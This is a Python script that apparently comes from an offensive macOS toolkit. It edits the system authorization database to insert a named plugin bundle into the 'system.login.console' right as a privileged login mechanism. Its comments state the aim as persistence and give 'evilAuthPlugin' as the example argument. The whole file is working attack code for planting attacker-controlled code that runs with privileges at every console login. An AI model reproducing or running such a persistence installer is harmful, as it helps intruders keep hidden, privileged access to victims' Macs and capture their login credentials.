installplugin.py

## installplugin.py
#!/usr/bin/python

# install authorization plugin for persistence.
# orginal script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py
# system.login.console right should be used for auth plugins
# ex: installplugin.py evilAuthPlugin
import sys
import objc
from ctypes import CDLL, c_void_p, byref, c_char_p
from ctypes.util import find_library
from PyObjCTools import Conversion

Security = CDLL(find_library("Security.framework"))
AuthorizationRightSet = Security.AuthorizationRightSet
AuthorizationRightGet = Security.AuthorizationRightGet
AuthorizationCreate = Security.AuthorizationCreate

def authorization_right_get(right):
    db_buffer = c_void_p()
    AuthorizationRightGet(right, byref(db_buffer))
    if db_buffer:
        return objc.objc_object(c_void_p=db_buffer).mutableCopy()
    return None

def authorization_right_set(right, value):
    auth_ref = c_void_p()
    AuthorizationCreate(None, None, 0, byref(auth_ref))
    return AuthorizationRightSet(auth_ref, right, value.__c_void_p__(), None, None, None)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print "Please provide the bundle name, without the extension"
        sys.exit(0)

    bundle = sys.argv[1]
    authright = "system.login.console"

    db = authorization_right_get(authright)
    i = db["mechanisms"].index("HomeDirMechanism:status") #Get the position of the last HomeDirMechanism
    mechanismValue = u"{}:login,privileged".format(bundle)

    # Convert the pyobjc object to a python object, something we can change
    writeableDB = Conversion.pythonCollectionFromPropertyList(db, conversionHelper=None)
    writeableDB['mechanisms'].insert(i+1, mechanismValue)
    db = Conversion.propertyListFromPythonCollection(writeableDB, conversionHelper=None)

    # Update the authorization database
    authorization_right_set(authright, db)
    print "Done"